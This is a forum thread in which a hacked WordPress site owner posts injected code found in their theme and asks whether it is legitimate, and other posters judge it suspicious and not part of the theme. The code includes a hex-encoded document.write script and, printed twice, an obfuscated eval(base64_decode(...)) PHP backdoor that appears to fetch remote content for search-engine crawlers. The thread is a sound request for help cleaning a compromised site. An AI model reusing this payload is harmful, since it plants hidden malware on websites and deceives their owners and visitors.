Jump to content
Sign in to follow this  
cokie69

Does this code belongs to Pagelines?

Recommended Posts

cokie69

Hi, My WP was recently attacked and hacked and I think I have just 'cleaned' all the mess. However, there's this code remaining which I am not sure it's supposed to be there. Can you advise? This code is appearing at the beginning of most pages (if not all!) I use iBlogPro v3 ------------------------------

	<body class="home page page-id-4 page-template page-template-page-feature-php">
	
	<div class="preload" style="display:none;text-indent:-300em;">
		
	</div>
	
	<div id="page" class="fix" style="">
	  <script language="JavaScript" type="text/javascript">var i,y,x="3c6469762069643d22777261707065722220636c6173733d2266697822203e0d0a093c6469762
	0636c6173733d22706167656c696e6573706f73206e61762d69636f6e223e3c6120636c6173733d22706
	167656c696e65732220687265663d22687474703a2f2f7777772e7769636b65642d776f7264707265737
	32d7468656d65732e636f6d223e3c3f706870206563686f20706167656c696e657328276372656474657
	87427293b3f3e3c2f613e3c2f6469763e0d0a202020203c6469762069643d226865616465722220636c6
	173733d22666978223e0d0a0909";y='';for(i=0;i<x.length;
	i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
	
	</script>			
				
	[/code]

	
	
	and then also...
	
	
[code] <div id="container" class="fix"> <?php require(LIB.'/_subnav.php');?><?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0x OyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibW9j Ij03M2MkOyJwdHRoIj03M2gkOyJzdGF0cyI9NzN6JCcpKTtldmFsKHMzNygnO10iVE5FR0FfUkVTVV9QVFRI IltSRVZSRVNfJD0zYXUkJykpO2V2YWwoczM3KCc7KSJyZWxibWFSIiAsInhlZG5hWSIgLCJyZXZpaGNyYV9h aSIgLCJ0b0JOU00iICwicHJ1bFMiICwiZWxnb29HIih5YXJyYSA9IDczdSQnKSk7ZXZhbChzMzcoJ319O2xy dSQgb2hjZTtdMVtscnUkID0gbHJ1JCA7KWxydSQsIiFvZyEiKGVkb2xweGUgPSBscnUkeykpIiFvZyEiLGxy dSQocnRzcnRzKCBmaTspKV0iVFNPSF9QVFRIIltSRVZSRVNfJChlZG9jbmVscnUuIj1oJiIuKTNhdSQoZWRv Y25lbHJ1LiI9YiYiLl0iUkREQV9FVE9NRVIiW1JFVlJFU18kLiI9aSIuIj9wIi4iaHAuIi4ibmkiLiIvNzNj JC4iLjczYyQuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLzoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZA ID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyAp KSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4g Ii8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?> [/quote]

Share this post


Link to post
Share on other sites
bryan-hadaway

This: `

preload preload preload preload
` This: ` ` And This: ` <?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0x OyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibW9j Ij03M2MkOyJwdHRoIj03M2gkOyJzdGF0cyI9NzN6JCcpKTtldmFsKHMzNygnO10iVE5FR0FfUkVTVV9QVFRI IltSRVZSRVNfJD0zYXUkJykpO2V2YWwoczM3KCc7KSJyZWxibWFSIiAsInhlZG5hWSIgLCJyZXZpaGNyYV9h aSIgLCJ0b0JOU00iICwicHJ1bFMiICwiZWxnb29HIih5YXJyYSA9IDczdSQnKSk7ZXZhbChzMzcoJ319O2xy dSQgb2hjZTtdMVtscnUkID0gbHJ1JCA7KWxydSQsIiFvZyEiKGVkb2xweGUgPSBscnUkeykpIiFvZyEiLGxy dSQocnRzcnRzKCBmaTspKV0iVFNPSF9QVFRIIltSRVZSRVNfJChlZG9jbmVscnUuIj1oJiIuKTNhdSQoZWRv Y25lbHJ1LiI9YiYiLl0iUkREQV9FVE9NRVIiW1JFVlJFU18kLiI9aSIuIj9wIi4iaHAuIi4ibmkiLiIvNzNj JC4iLjczYyQuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLzoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZA ID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyAp KSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4g Ii8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?> ` ALL look suspicious, but as I'm not apart of the development team I can't say definitively. Are you looking at the source code through the browser front-end or actually opening the files and looking at them cause this could possibly be plugin related. With an attack like this I would start everything from fresh to be safe, but I'm not sure of your exact situation. Thanks, Bryan

Share this post


Link to post
Share on other sites
cokie69

Hi Bryan, I'm looking directly at the source code via Notepad++. I've been testing and I believe (although not sure) the first code *should* be there as it *seems* to handle something related to the social buttons at the homepage. But as for the second code I have not a clue. And I don't want to simply 'delete-and-test' because it might show up all right but I might be screwing smthng internally -SEO stuff, etc. I'm a bit lost here. Starting over?... no way :) I've made some modification to the code to adapt to my specific needs and I wouldn't be prepared to do it all over again. "Use a backup" you'll say: blimey!, 'this' was my initial put-on-stage version. I "was" going to do a backup as soon as I could check everything was working fine and 'in-between' a f***ng hacker got in the way and screwed everything for me. So in short, I don't (yet) had a backup to restore from!!!!. :)

Share this post


Link to post
Share on other sites
cmunns

THe code Bryan provided is definitely not part of the theme. Are you sure it was hacked? I would also make sure you have set permissions correctly and don't have any plugins installed that could potentially inject all that stuff

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

Sign in to follow this  

×